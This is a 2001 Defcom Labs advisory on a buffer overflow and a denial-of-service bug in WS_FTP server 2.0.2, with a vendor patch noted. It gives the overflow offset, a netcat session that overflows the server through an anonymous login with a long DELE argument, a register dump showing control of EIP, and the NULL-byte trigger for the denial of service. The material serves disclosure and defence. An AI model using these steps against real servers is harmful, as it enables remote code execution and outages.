====================================================================== Defcom Labs Advisory def-2001-28 WS_FTP server 2.0.2 Buffer Overflow and possible DOS Author: Andreas Junestam <andreasat_private> Co-Author: Janne Sarendal <janneat_private> Release Date: 2001-07-26 ====================================================================== ------------------------=[Brief Description]=------------------------- WS_FTP server 2.0.2 contains a buffer overflow which affects the following commands: * DELE * MDTM * MLST * MKD * RMD * RNFR * RNTO * SIZE * STAT * XMKD * XRMD This buffer overflow gives an attacker the ability to run code on the target with SYSTEM RIGHTS, due to the fact that the server runs as a service by default. OBS: This is only valid when logged in as an anonymous user, not an ordinary one. The server also contains a easy-to-trigger DOS. ------------------------=[Affected Systems]=-------------------------- - WS_FTP server 2.0.2, havn't tested other versions ----------------------=[Detailed Description]=------------------------ * Command Buffer Overrun All the above mentioned commands seems to be using the same parsing code which suffers from a buffer overflow. By sending a command with an argument greater than 478 (474 bytes + new return address) bytes, a buffer will overflow and the EIP will be overwritten. A proof-of-concept exploit is attached to the advisory, which works against WS_FTP server 2.0.2 running on WIN2K (Professional and Server, any SP). C:\tools\web>nc -nvv 127.0.0.1 21 (UNKNOWN) [127.0.0.1] 21 (?) open 220-helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520) 220-Tue Jun 19 14:00:21 2001 220-30 days remaining on evaluation. 220 helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520) user ftp 331 Password required pass ftp 230 user logged in DELE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Access violation - code c0000005 (first chance) eax=000000ea ebx=0067c278 ecx=000000ea edx=00000002 esi=0067c278 edi=77fca3e0 eip=41414141 esp=0104df88 ebp=41414141 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010246 * Possible DOS By sending a couple of NULL(0x0) characters, the WS_FTP Server will spike at 100% CPU. ---------------------------=[Workaround]=----------------------------- Download the new version from: http://www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html -----------------------------=[Exploit]=------------------------------ See attached file, ws_ftp.pl -------------------------=[Vendor Response]=-------------------------- This issue was brought to the vendors attention on the 18th of June, 2001. Patch is released. ====================================================================== This release was brought to you by Defcom Labs labsat_private www.defcom.com ======================================================================
This archive was generated by hypermail 2b30 : Thu Jul 26 2001 - 08:31:41 PDT